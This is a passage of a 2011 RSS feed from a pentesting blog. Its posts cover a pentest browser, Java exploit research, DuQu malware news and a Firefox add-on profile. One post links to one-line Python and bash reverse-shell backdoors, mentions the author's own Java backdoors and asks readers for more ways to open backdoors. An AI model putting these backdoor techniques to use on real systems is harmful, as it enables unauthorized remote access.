		<description><![CDATA[Mantra from OWASP seems a good project https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework &#160; It is a Chrome environment (portable, so it does not interfere with your everyday-use chrome installation) with many useful add-ons for pentesters. Personally, I think there are two or three things missing in comparison with a good Firefox profile (something like the one I posted before, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=135&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Mantra from OWASP seems a good project</p>
<p><a href="https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework">https://www.owasp.org/index.php/OWASP_Mantra_-_Security_Framework</a></p>
<p>&nbsp;</p>
<p>It is a Chrome environment (portable, so it does not interfere with your everyday-use chrome installation) with many useful add-ons for pentesters. Personally, I think there are two or three things missing in comparison with a good Firefox profile (something like the one I posted before, which coul become better)&#8230; I was <strong><em>not able to match what they say it is present to what I actually find</em></strong> opening Mantra.</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/135/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/135/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/135/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=135&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/13/owasp-mantra-pentest-chrome-browser-project/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>Java Exploits/Research</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/08/java-exploitsresearch/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/08/java-exploitsresearch/#comments</comments>
		<pubDate>Tue, 08 Nov 2011 20:56:12 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[info]]></category>
		<category><![CDATA[pentesting]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=126</guid>
		<description><![CDATA[This researcher is a new myth for me: @jduck1337 This paper is very interesting, and it is something I was thinking about since 3-4 years&#8230; Exploiting memory corruptions in java is always something very fascinating to me. http://www.accuvant.com/capability/accuvant-labs/security-research/featured-presentation/exploiting-java-memory-corruption-vulnerabilities Another interesting &#38; extremely clever work, @mihi42 Java RMI exploit, which takes advantage about default Java RMI configuration; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=126&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This researcher is a new myth for me: <a href="https://twitter.com/#!/jduck1337">@jduck1337</a></p>
<p>This paper is very interesting, and it is something I was thinking about since 3-4 years&#8230; Exploiting memory corruptions in java is always something very fascinating to me.</p>
<p><a href="http://www.accuvant.com/capability/accuvant-labs/security-research/featured-presentation/exploiting-java-memory-corruption-vulnerabilities">http://www.accuvant.com/capability/accuvant-labs/security-research/featured-presentation/exploiting-java-memory-corruption-vulnerabilities</a></p>
<p>Another interesting &amp; extremely clever work, <a href="https://twitter.com/#!/mihi42">@mihi42</a> Java RMI exploit, which takes advantage about default Java RMI configuration; it is very different from Joshua&#8217;s work, but it coult be devastating in some environment&#8230;</p>
<p><a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/multi/misc/java_rmi_server.rb">http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/multi/misc/java_rmi_server.rb</a></p>
<p>&nbsp;</p>
<p>This work by <a href="https://twitter.com/#!/mihi42">@mihi42</a> makes possible to run Java code outside the sandbox, exploiting a design flaw in Mozilla Rhino Script engine:</p>
<p><a href="http://schierlm.users.sourceforge.net/CVE-2011-3544.html">http://schierlm.users.sourceforge.net/CVE-2011-3544.html</a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>, <a href='http://scoperchiatore.wordpress.com/category/pentesting/'>pentesting</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/126/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=126&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/08/java-exploitsresearch/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>DuQu &#8211; (trying to) summarize infos</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/04/duqu-trying-to-summarize-infos/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/04/duqu-trying-to-summarize-infos/#comments</comments>
		<pubDate>Fri, 04 Nov 2011 18:45:16 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[duqu]]></category>
		<category><![CDATA[info]]></category>
		<category><![CDATA[malaware]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=115</guid>
		<description><![CDATA[Really too may tweet/linkedin/blog/forum/news&#8230; I will try to collect them in a single post, in order to go deeper in case I will have time&#8230; December 13,2011 Iran shuts down Duqu-linked servers December 4,2011 Stuxnet, Duqu &#38; Conficker, a new generation of cyber weapons … even “without a father” November 28,2011 Duqu: involution of Stuxnet [slides] November [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=115&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Really too may tweet/linkedin/blog/forum/news&#8230; I will try to collect them in a single post, in order to go deeper in case I will have time&#8230;</p>
<p>December 13,2011 <a href="http://www.kurat.com/links/india-shuts-server-linked-to-duqu-computer-virus-5?&amp;stream=nuclear-iran">Iran shuts down Duqu-linked servers</a></p>
<p>December 4,2011 <a href="http://securityaffairs.co/wordpress/?p=391">Stuxnet, Duqu &amp; Conficker, a new generation of cyber weapons … even “without a father”</a></p>
<p>November 28,2011 <a href="http://www.slideshare.net/matrosov/win32duqu-involution-of-stuxnet">Duqu: involution of Stuxnet [slides]</a></p>
<p>November 18,2011 <a href="http://www.homelandsecuritynewswire.com/dr20111118-duqu-mystery-deepens-as-iran-admits-infection">DuQu mystery deepens as Irans admits infection</a></p>
<p>November 18, 2011 <a href="http://securityaffairs.co/wordpress/?p=197">DuQu &#8211; Do we really know the enemy?</a></p>
<p>November 14,2011 <a href="http://www.cyberwarnews.info/2011/11/14/iran-claims-it-can-control-duqu-virus/">Iran claims it can control DuQu</a></p>
<p>November 13, 2011 <a href="http://www.msnbc.msn.com/id/45278589#.TsC9zsNRwcI">Iran says it has detected and is fighting DuQu</a> and <a href="http://thehackernews.com/2011/11/duqu-computer-virus-detected-by-iran.html?utm_source=feedburner&amp;utm_medium=twitter&amp;utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Daily+Cyber+News+Updates%29">here</a></p>
<p>November 13, 2011 <a href="http://www.cyberwarnews.info/2011/11/13/duqu-virus-more-serious-threat-than-previously-thought/">DuQu was more serious than previously thought</a></p>
<p>November 11,2011 <a href="http://www.computerworld.com/s/article/9221760/Hackers_may_have_spent_years_crafting_Duqu">Hackers may have spent years crafting DuQu</a></p>
<p>November 11,2011 <a href="http://www.securelist.com/en/blog/208193197/The_Mystery_of_Duqu_Part_Two">DuQu saga continues: Mr B. Jamson and TV&#8217;s Dexter</a></p>
<p>November 7,2011 <a href="http://www.itworld.com/security/221933/duqu-may-stars-spy-virus-iran-reported-having-been-attacked-april">DuQu may derive from stars</a>  and<a href="http://paulsparrows.wordpress.com/2011/10/21/stuxnet-duqu-stars-and-galaxies/"> Stuxnet, DuQu, Stars and Galaxies&#8230;</a>, October 21, 2011, from Paolo Passeri&#8217;s blog</p>
<p>November 6,2011 <a href="https://github.com/halsten/Duqu-detectors">DuQu Open Source detector released (Python)</a></p>
<p>November 5,2011 <a href="http://thehackernews.com/2011/11/duqu-analysis-and-detection-tool-by-nss.html">DuQu analisys and detection tool by NSS labs</a></p>
<p>November 5, 2011 <a href="http://thehackernews.com/2011/11/duqu-malware-was-created-to-spy-on.html">DuQu was created to spy on Iranian nuclear program</a></p>
<p>November 4, 2011, <a href="http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/231902310/five-things-to-do-to-defend-against-duqu.html">Five Things To Do To Defend Against Duqu</a></p>
<p>November 4, 2011, <a href="http://threatpost.com/en_us/blogs/microsoft-releases-workaround-kernel-flaw-used-duqu-110411">Microsoft Releases Workaround For Kernel Flaw Used By Duqu </a><br />
<a href="http://technet.microsoft.com/en-us/security/advisory/2639658">http://technet.microsoft.com/en-us/security/advisory/2639658</a></p>
<p>November 3, 2011<br />
<a href="http://technet.microsoft.com/en-us/security/advisory/2639658">MS Windows 0-Day exploited by Duqu is caused by a TrueType font parsing vuln</a>. Blocking T2EMBED.DLL prevents the attack</p>
<p>November 3, 2011 <a href="http://www.reuters.com/article/2011/11/03/us-cyberattack-belgium-idUSTRE7A25KC20111103">DuQu hackers shift to Belgium after India Raid</a></p>
<p>November 2, 2011 <a href="http://www.scmagazineus.com/duqu-father-son-or-unholy-ghost-of-stuxnet/article/215851/">DuQu: The son or the father of StuxNet</a></p>
<p>November 2, 2011 <a href="http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/231902150/what-is-duqu-up-to.html?itc=edit_stub">What is DuQu up to?</a></p>
<p>October 28, 2001 <a href="http://mobile.reuters.com/article/idUSN1E79R1G020111028?irpc=932">India shuts server linked to Duqu computer virus</a></p>
<p>October 28, 2011 <a href="http://blog.eset.com/?p=10105">Win32/Duqu analysis: the RPC edition<br />
</a><br />
October 27, 2011 <a href="http://arstechnica.com/business/news/2011/10/spotted-in-iran-trojan-duqu-may-not-be-son-of-stuxnet-after-all.ars?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=rss">Spotted in Iran, trojan Duqu may not be &#8220;son of Stuxnet&#8221; after all</a></p>
<p>October 27, 2011 <a href="http://searchsecurity.techtarget.com/news/2240102805/New-Duqu-Trojan-analysis-questions-Stuxnet-connection">New Duqu Trojan analysis questions Stuxnet connection<br />
</a><br />
October 27, 2011 <a href="http://www.computer.org/portal/web/news/home/-/blogs/analysis:-duqu-malware-launches-custom-attacks?utm_source=dlvr.it&amp;utm_medium=twitter">Analysis: Duqu Malware Launches Custom(izable) Attacks<br />
</a><br />
October 26, 2011 <a href="http://www.networkworld.com/news/2011/102611-duqu-incidents-detected-in-iran-252435.html">Duqu incidents detected in Iran and Sudan<br />
</a><br />
October 26, 2011 <a href="http://www.computerworld.com/s/article/9221234/Duqu_Stuxnet_link_unclear">Duqu, Stuxnet link unclear<br />
</a></p>
<p>October 26, 2011 <a href="http://www.secureworks.com/research/threats/duqu/">Duqu Trojan Questions and Answers</a></p>
<p>October 25, 2011 <a href="http://www.securelist.com/en/blog/208193197/The_Mystery_of_Duqu_Part_Two">The mistery of DuQu</a></p>
<p>October 24, 2011 <a href="http://www.symantec.com/connect/w32_duqu_precursor_next_stuxnet">Symantec analisys: W32.Duqu: The Precursor to the Next Stuxnet</a></p>
<p>October 21, 2011 <a href="http://thehackernews.com/2011/10/stuxnets-son-duqu-removal-tool-released.html">DuQu first removal tool (Symantec)</a></p>
<p>October 18, 2011 <a href="http://blogs.mcafee.com/mcafee-labs/the-day-of-the-golden-jackal-%E2%80%93-further-tales-of-the-stuxnet-files">The Day of the Golden Jackal – The Next Tale in the Stuxnet Files: Duqu Updated<br />
</a></p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/duqu/'>duqu</a>, <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>, <a href='http://scoperchiatore.wordpress.com/category/malaware/'>malaware</a>, <a href='http://scoperchiatore.wordpress.com/category/windows/'>windows</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/115/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/115/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/115/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=115&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/04/duqu-trying-to-summarize-infos/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>Web application testing from Iphone</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/04/web-application-testing-from-iphone/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/04/web-application-testing-from-iphone/#comments</comments>
		<pubDate>Fri, 04 Nov 2011 10:17:45 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[pentesting]]></category>
		<category><![CDATA[webapps]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=112</guid>
		<description><![CDATA[I missed this&#8230; http://www.gnucitizen.org/blog/well-websecurify-runs-on-the-iphone/ &#160; &#160; Gnucitizen says: &#8220;The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=112&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I missed this&#8230; <a href="http://www.gnucitizen.org/blog/well-websecurify-runs-on-the-iphone/">http://www.gnucitizen.org/blog/well-websecurify-runs-on-the-iphone/</a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Gnucitizen says: &#8220;<em>The testing engine used in this particular version of Websecurify <strong>is optimized to run with the least possible amount of memory</strong>. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. This is not directly and only applicable to the iPhone version. No! <strong>Similar tradeoffs are also present even in standard desktop/server based scanners although they are usually less visible and obscured behind tones of options</strong>. The bottom line is that the scanner not only runs natively on the iOS but also works as expected.</em>&#8220;</p>
<p>&nbsp;</p>
<p>I don&#8217;t like apple products, so I don&#8217;t have an iPhone; will they become &#8220;small-and-not-visible&#8221; hacking instruments? For post exploit in a wifi pentest it is important to have such a small device!</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/pentesting/'>pentesting</a>, <a href='http://scoperchiatore.wordpress.com/category/webapps/'>webapps</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/112/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/112/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/112/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/112/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/112/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/112/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/112/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/112/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=112&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/04/web-application-testing-from-iphone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>One-line shellocode(s)</title>
		<link>http://scoperchiatore.wordpress.com/2011/11/04/cool-python-one-line-shellocodes/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/11/04/cool-python-one-line-shellocodes/#comments</comments>
		<pubDate>Fri, 04 Nov 2011 10:06:05 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[backdoor]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=108</guid>
		<description><![CDATA[This article shows some examples of shellcodes in python (shellcode in this case means backdoors): reverse and &#8220;direct&#8221; tcp backdoor opened through python. http://www.pentestit.com/source-code-python-line-shellcode/ In my experience, working with SunOS or hardened RHEL/SEL, it is difficult to find a working installation of python/perl/ruby (that&#8217;s impossible!!) This is why i developed those backdoor (wsh and jbd) [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=108&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This article shows some examples of shellcodes in python (shellcode in this case means backdoors): reverse and &#8220;direct&#8221; tcp backdoor opened through python.</p>
<p><a href="http://www.pentestit.com/source-code-python-line-shellcode/">http://www.pentestit.com/source-code-python-line-shellcode/</a></p>
<p>In my experience, working with SunOS or hardened RHEL/SEL, it is difficult to find a working installation of python/perl/ruby (that&#8217;s impossible!!)</p>
<p>This is why i developed those backdoor (wsh and jbd) completely in Java&#8230; I always find Java in any environment (any = 95%)</p>
<p>&nbsp;</p>
<p>Another &#8220;old but useful&#8221; is bash-reverse-shell-in-2-lines; it works :D</p>
<p><a href="http://www.gnucitizen.org/blog/reverse-shell-with-bash/">http://www.gnucitizen.org/blog/reverse-shell-with-bash/</a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Do anyone know other &#8220;quick-and-dirty&#8221; ways to open backdoors [apart from nc]?</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/backdoor/'>backdoor</a>, <a href='http://scoperchiatore.wordpress.com/category/python/'>python</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/108/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/108/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/108/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=108&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/11/04/cool-python-one-line-shellocodes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
		<item>
		<title>Firefox7 profile with pentesting add-ons</title>
		<link>http://scoperchiatore.wordpress.com/2011/10/31/firefox7-profile-with-pentesting-add-ons/</link>
		<comments>http://scoperchiatore.wordpress.com/2011/10/31/firefox7-profile-with-pentesting-add-ons/#comments</comments>
		<pubDate>Mon, 31 Oct 2011 19:11:11 +0000</pubDate>
		<dc:creator>scoperchiatore</dc:creator>
				<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://scoperchiatore.wordpress.com/?p=103</guid>
		<description><![CDATA[I uploaded a pre-built Penetration Testing FireFox7 profile, with many useful extension: Firefox7_pentestin_profile.rar &#160; I created this profile from scratch, starting from add-ons listed in the FireCAT project; many extensions did not work anymore, but the most important does; there are more or less 20 extensions, basically: no logging extensions, if you know please comment [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=103&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I uploaded a pre-built Penetration Testing FireFox7 profile, with many useful extension:</p>
<p><a href="http://www.mediafire.com/file/iw4g6n46im07rd5/ff7_pentesting_profile.rar" target="_blank">Firefox7_pentestin_profile.rar</a></p>
<p>&nbsp;</p>
<p>I created this profile from scratch, starting from add-ons listed in the <a href="http://firecat.fr/the_catalog.html" target="_blank">FireCAT</a> project; many extensions did not work anymore, but the most important does; there are more or less 20 extensions, basically:</p>
<ul>
<li>no logging extensions, if you know please comment this post, I really would like one of it</li>
<li>you&#8217;ll find hackbar, decoder, tamper data, firebug, cookie manager, user agent switch, web developer,</li>
<li>you&#8217;ll find downthemall, tabmixplus</li>
<li>foxyproxy with a localhost:8080 entry (no model specified, you need to select it for all URLs)</li>
<li>&#8220;news&#8221;: flash firebug, poster (web services testing), sqlite manager, fireforce, fireshot</li>
<li>as default, there is a theme with little paragraph-spacing (so you should not have long right-click menus)</li>
</ul>
<p>&nbsp;</p>
<p>Any other option is in the default state as a plain firefox installation. If you don&#8217;t know, you can run multiple firefox profiles at the same type; just run:</p>
<ul>
<li>/path/to/firefox &#8211;no-remote -P</li>
<li>C:\path\to\firefox.exe &#8211;no-remote -P</li>
</ul>
<p>-P -&gt; shows the profile manager</p>
<p>&#8211;no-remote -&gt;you can start more profiles at the same time</p>
<p>&nbsp;</p>
<p>To use this one, just unpack the file (I suggest you into a cyphered partition), then run Firefox with those options, create new profile, select folder, go to the folder where you unpacked this RAR, and give it a name.</p>
<p>&nbsp;</p>
<p>Extension suggestions are always welcome :)</p>
<br />Filed under: <a href='http://scoperchiatore.wordpress.com/category/info/'>info</a>  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/scoperchiatore.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/scoperchiatore.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/scoperchiatore.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/scoperchiatore.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/scoperchiatore.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/scoperchiatore.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/scoperchiatore.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/scoperchiatore.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/scoperchiatore.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/scoperchiatore.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/scoperchiatore.wordpress.com/103/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/scoperchiatore.wordpress.com/103/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/scoperchiatore.wordpress.com/103/"><img 